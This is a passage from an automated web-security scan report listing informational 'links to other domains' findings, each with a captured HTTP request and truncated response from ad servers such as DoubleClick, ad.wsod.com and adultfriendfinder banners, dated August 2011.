User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 15 Aug 2011 18:41:41 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 7925
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Fri Dec 17 15:50:07 EST 2010 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
g.com/click/img%3Fmt_aid%3D76407451872406880%26mt_id%3D112511%26mt_adid%3D100488%26mt_uuid%3D4e394114-5150-5bce-73fa-628197421391%26redirect%3Dhttp://www.geico.com/landingpage/go140.htm%3Fsoa%3D59801"><img src="http://s1.2mdn.net/2992003/09-1213-yellow gecko-728x90 Rev.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

13.4. http://ad.doubleclick.net/adi/amzn.us.house.redirect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/amzn.us.house.redirect/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k38yjeHuSHI.bTJW0F8Dg.lsVtPmkXIkrDvUMvsBepdbMb2ghwXlkru9AXPlHpDh3AGFy7-9MamUXS1Tr7vcmFnolYkGkL57fFK16oAXEKpCKpXcQ1eEeOYDrWE2llnVp6NxfC9gjGXECHbqbKdfOR4W5pWS3rcbviAQY.Igkazish0RgA7LHICD7p4qn-Tru1g7JM4fmecNCl6Npzuo6AuCnMCK6R4m7rKoqSDQ9Gkf3EZoy6QHXeRdFpo95-hiX1C9G8pJRsu8Fp6ZteAeKisiBmB74iMGUWGrah6XW.ZJDTKTQxQhko5X9EM1Oa8-.iBSicVnbtYQ9ait5Dn-YTEFyZnCYtfUfXf9zFfSEFBpO03suLL9pqQrZ.yPdj7Vob1aS6PK7Rz5sf0iu3Qrn4mv2.cpSP7BomB8.h08ZhdCEsUwfYSc96kHdEjUXzR1tVBiwV1v4xdxmYQQkw8r8z0lh-uT1kJQV0aRH9qsW2jEF17Dev9Ywuhsc.h0a7FWcsNTtsxKJ6JifJjW2zg3jpTc9fDaHDpzVElI51j-BRyXBFXF2RayGvWR0e8O1yqI5oa9NvPbS-9CplZHeUV1cXCv0lqVKT1sPyXU5tiwJtw0GXQtdQVHKBae4OFtZ2oITbUYAl3wNrulDLb2LC5.FmjL4dBOfZe9xl8H3Y7e-DR5uQ0FCTupDmD2IQCgxZs4E-pKqkXGMOGATFnu5gpufNXilJXNDzTuXcAQjDEq-tdWU7CpQti0E7AOVccWwMf1V0GY891kDHcdd7pJLtl9aw0_&d=;ord=4,525,044,809,135,282,754? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/a/ifb/pda_comm2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 2154
Date: Mon, 15 Aug 2011 18:26:17 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 15103 Template Name = !IMDb - Simple 3rd Pa
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>
...[SNIP]...

13.5. http://ad.doubleclick.net/adj/imdb2.consumer.main/showtimes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/imdb2.consumer.main/showtimes

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/imdb2.consumer.main/showtimes;tile=3;sz=300x250,11x1;p=tr;p=tc;ct=com;g=th;g=sf;tt=f;b=t25;b=t250a;coo=usa;g=my;k=c;k=t;id=tt1650062;m=PG13;bpx=1;s=1009;s=32;s=c5;s=c4;s=c1;s=c12;s=c17;s=c4;;u=2915982436388731;ord=2915982436388731? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 263
Date: Mon, 15 Aug 2011 18:41:17 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b64/0/0/%2a/q;44306;0-0;0;32705666;4307-300/250;0/0/0;u=2915982436388731;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

13.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**;10,3,183;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26page.allowcompete%3Dyes_@26tile%3D1313434014105_@26page.allowcompete%3Dyes_@26domId%3D67962?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=25:1715:1137:106:0:53518:1313434067:L|25:1715:1138:106:0:53518:1313433994:L|33:1411:1209:100:0:52753:1312480942:L; expires=Thu, 15-Sep-2011 18:47:47 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 949

   function wsod_image1715() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1715.1137.iframe.150x50/**;10.3183;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/150x50_ST-$7.png" alt="Online $7 Trades! Click to find out more!" /></a>
...[SNIP]...

13.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2923

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.img.150x50/1313434009**;" />
...[SNIP]...

13.8. http://ads.tw.adsonar.com/adserving/getAds.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1290411&pid=754773&ps=-1&zw=220&zh=200&url=http%3A//money.cnn.com/2011/08/15/technology/google_motorola/index.htm%3Fhpt%3Dhp_t2&v=5&dct=Google%20to%20buy%20Motorola%20Mobility%20for%20%2412.5%20billion%20-%20Aug.%2015%2C%202011&ref=http%3A//www.cnn.com/ HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TData=_Mon%2C%2008%20Aug%202011%2001%3A36%3A19%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:50 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 10045


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
<td class="sps_1290516" style="height:12px;" nowrap="nowrap" align="right">
                                       &nbsp;<a href="http://cnnmoney.sl.advertising.com/admin/advertisers/indexPl.jsp" target="_blank">
                                       
                                           Buy a link here
                                       
                                       </a>
...[SNIP]...
<td><iframe src="http://cdn.tacoda.at.atwola.com/an/qseg.html" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...

13.9. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /serve/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=YMP06JsA7quIjC; JSESSIONID=eafc440c2493ffe3af4cd0b47975

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=eb23298ece5b80ae456717e9cc54; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 15 Aug 2011 18:26:49 GMT
Vary: Accept-Encoding
Content-Length: 1490
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><iframe src="http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142650;dct=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250"><script language="JavaScript" type="text/javascript">
...[SNIP]...
<a href="http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142650;dct=http://clk.atdmt.com/CNT/go/286369565/direct;wi.300;hi.250/01/" target="_blank"><img border="0" src="http://view.atdmt.com/CNT/view/286369565/direct;wi.300;hi.250/01/" /></a></noscript></iframe><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110815142650&cmxid=2101.020017113901014305xmc" style="display: none" height="1" width="1" border="0" /><script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=12915&campId=171139"></script>
...[SNIP]...

13.10. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:52 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,IPDnYK9LPElKtOp23iKt5ZzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki26-18.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13347
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<meta http-equiv="Content-Location" content="http://banners.adultfriendfinder.com/go/page/iframe_cm_26358?dcb=sexfinder.com&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html" />
<link rel="stylesheet" type="text/css" href="http://graphics.pop6.com/images/ffadult/css/header.css" />
<link rel="shortcut icon" type="image/x-icon" href="http://graphics.pop6.com/images/ffadult/favicon_2.ico" />
<link rel="meta" href="http://graphics.pop6.com/images/ICRA_labels_rdf_adult.rdf" type="application/rdf+xml" title="ICRA labels" />
<meta http-equiv="pics-Label" content='(pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l gen true for "http://sexfinder.com" r (n 3 s 3 v 0 l 3 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen tr
...[SNIP]...
<div align="center">
<script type="text/javascript" src="http://graphics.pop6.com/javascript/live/rm_swfobject-1287617202.js"></script>
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=1760&site=ffadult&session=GQ5%60J%5EU%40jEUU+1313434702+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fmedleyads.com%2Fspot%2F5232.html&pagestate=&country=United+States&city=&lang=english&level=&gpid=g1255058&pid=p1935206.submad_70975_1_s5232" width=1 height=1 border=0></noscript>
...[SNIP]...

13.11. http://banners.bookofsex.com/go/page/iframe_cm_26400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /go/page/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:04:21 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,g_7fBSdcxvNyHvmGEg62DRPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:04:21 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:04:21 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:04:21 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:04:21 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:04:21 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki10-25.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 24733
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<meta http-equiv="Content-Location" content="http://banners.bookofsex.com/go/page/iframe_cm_26400&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html" />
<link rel="stylesheet" type="text/css" href="http://graphics.pop6.com/images/ffadult/css/header.css" />
<link rel="shortcut icon" type="image/x-icon" href="http://graphics.pop6.com/images/bookofsex.com/favicon.ico" />
<link rel="meta" href="http://graphics.pop6.com/images/ICRA_labels_rdf_adult.rdf" type="application/rdf+xml" title="ICRA labels" />
<meta http-equiv="pics-Label" content='(pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l gen true for "http://bookofsex.com" r (n 3 s 3 v 0 l 3 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 3) gen tr
...[SNIP]...
<div id="geotext">
<a id="text" href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vcC9yZWdpc3Rlci5jZ2k/cGlkPXAxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyJnNpdGU9ZmZhZHVsdCZkY2I9Ym9va29mc2V4LmNvbSZhbXA7bGFuZz1lbmdsaXNo" target="_blank" title="Click here for more.">Hookup with members near <span>
...[SNIP]...
<span class="title" >Meet <a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcw==" target="_blank">bookofsex.com</a> members near <a href="http://medleyads.com/spot/c/1313434555/1247371422/13190.html?MD=aHR0cDovL2Jvb2tvZnNleC5jb20vc2VhcmNoL3AxOTM0NTEzLnN1Ym1hZF8yNDgxMF8xX3M1MjMyPzE4UEc9MSZjaXR5PURhbGxhcyZjb3VudHJ5PVVuaXRlZCtTdGF0ZXMmZmluZF9zZXg9MiZsb29raW5nX2Zvcl9wZXJzb249MSZwaG90bz0xJnJhY2U9MCZzaG93X2NpdHk9MSZzdGF0ZT1UZXhhcw==" target="_blank">Dallas</a>
...[SNIP]...
<div style="text-align:center; white-space:nowrap;">


